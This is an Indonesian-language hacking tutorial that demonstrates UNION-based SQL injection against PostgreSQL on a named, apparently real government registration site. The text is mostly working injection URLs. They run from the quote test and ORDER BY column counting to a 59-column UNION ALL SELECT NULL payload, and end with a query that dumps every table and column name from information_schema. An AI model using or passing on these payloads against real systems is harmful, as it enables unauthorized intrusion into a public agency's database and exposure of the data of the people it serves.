Tutorial SQL PostgreSql

Assalamualaikum bree, balik lagi dengan gua Danzz. Oke kali ini gua bakal ngasih tutorial SQL PostgreSql, daripda bnyk bcot langsung aja ke tutorial nya...

Live Target : https://registrasi.magetan.go.id/zproject.php/account/email?satker=11

1. Langkah pertama kita kasih string ( ' ) untuk ngecek web tsb vuln sql apa ngga

Setelah gua kasih string ( ' ) page nya muncul kalimat tsb dan keterangannya tipe postgre ya bree

2. Kalau udah tau web nya vuln, tinggal kita kasih order by nya aja 

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+1--+-

Web nya balik ke semua tanpa ada keterangan eror

3. Sekarang kita cari column  eror nya ni bree dengan mengganti angka 1 menjadi angka yang lain sampai ke temu column yang eror

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+10--+ ~> aman

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+30--+ ~> aman

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+60--+- ~> eror

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+59--+- ~> aman

Oke disini column eror nya 59

4. Karna udah tau column eror nya smpai di 60 kita lanjut ke +Union+Select nya

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+-

Loh tapi kok eror? Karna eror kita coba ganti dengan NULL

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Setelah diganti dengan NULL ternyata bisa...

5. Tinggal kalian cek satu persatu aja NULL nya dengan menggunakan version() jangan lupa tambahkan string ( - ) didepan param link ny

setelah beberapa kali gua cek satu persatu gua dapat di NULL ke 34 yang akhirnya tembus dengan version()

6. Kalau udah dapat begini tinggal kalian print dios aja deh

- https://registrasi.magetan.go.id/zproject.php/account/email?satker=-11%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,%27%3C~DanzzHaxor~%3E%27,column_name)::TEXT),$$%3Cli%3E$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$informatio%E2%80%8Bn_schema$$,$$pg_catalog$$)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Oke sekian tutorial SQL PostgreSql dari gua, semoga kalian paham apa yang gua jelasin, Wassalamualaikum Wr.Wb